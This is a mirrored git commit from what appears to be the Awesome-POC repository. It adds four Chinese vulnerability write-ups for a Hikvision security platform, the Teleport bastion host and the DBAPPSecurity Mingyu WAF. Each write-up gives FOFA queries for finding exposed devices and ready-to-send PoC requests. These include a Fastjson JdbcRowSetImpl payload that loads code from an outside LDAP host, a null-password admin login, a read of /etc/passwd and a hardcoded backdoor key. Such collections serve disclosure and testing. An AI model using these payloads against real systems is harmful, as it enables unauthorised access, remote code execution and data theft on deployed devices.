admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

更新漏洞库:网络设备漏洞/

Browse Source
This commit is contained in:
Threekiii 2022-08-24 14:34:12 +08:00
parent 1cead7bb0b
commit 787d4d4465
4 changed files with 147 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
网络设备漏洞/HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞.md Normal file
View File

@ -0,0 +1,34 @@
# HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
## 漏洞描述
HIKVISION 综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞攻击者通过漏洞可以执行任意命令获取服务器权限
## 漏洞影响
```
HIKVISION 综合安防管理平台
```
## FOFA
```
app="HIKVISION-综合安防管理平台"
```
## 漏洞复现
登录页面
![image-20220824134144287](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241341481.png)
验证POC
```
POST /bic/ssoService/v1/applyCT
Content-Type: application/json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
```
![image-20220824134503675](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241345726.png)

37
网络设备漏洞/Teleport堡垒机 do-login 任意用户登录漏洞.md Normal file
View File

@ -0,0 +1,37 @@
# Teleport堡垒机 do-login 任意用户登录漏洞
## 漏洞描述
Teleport堡垒机存在任意用户登录漏洞攻击者通过构造特殊的请求包可以登录堡垒机获取其他系统权限
## 漏洞影响
```
Teleport Version <= 20220817
```
## FOFA
```
app="TELEPORT堡垒机"
```
## 漏洞复现
登录页面
![image-20220824134958109](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241349427.png)
验证POC captcha参数为验证码
```
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}
```
![image-20220824135439227](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241354271.png)
code 返回 0 即为成功,再访问 /dashboard 获取管理员权限
![image-20220824135449199](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241354243.png)

31
网络设备漏洞/Teleport堡垒机 get-file 后台任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,31 @@
# Teleport堡垒机 get-file 后台任意文件读取漏洞
## 漏洞描述
Teleport堡垒机 get-file接口存在后台任意文件读取漏洞攻击者利用任意用户登录漏洞后可以获取后台权限再进一步利用任意文件读取获取服务器上的敏感文件
## 漏洞影响
```
Teleport Version <= 20220817
```
## FOFA
```
app="TELEPORT堡垒机"
```
## 漏洞复现
登录页面
![image-20220824134958109](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241355622.png)
登录后使用POC验证
```
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
```
![image-20220824135554806](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241355866.png)

45
网络设备漏洞/安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞.md Normal file
View File

@ -0,0 +1,45 @@
# 安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞
## 漏洞描述
安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录攻击者可以通过漏洞直接登录后台
## 漏洞影响
```
安恒 明御WEB应用防火墙
```
## FOFA
```
app="安恒信息-明御WAF"
```
## 漏洞复现
登录页面
![image-20220824142132930](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241421007.png)
验证POC
```
/report.m?a=rpc-timed
```
![image-20220824142150382](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241421426.png)
再访问主页面跳转配置页面
![image-20220824142208002](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241422055.png)
发送请求包配置系统SSH等
```
POST /system.m?a=reserved
key=!@#dbapp-waf-dev-reserved#@!
```
![image-20220824142219609](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241422661.png)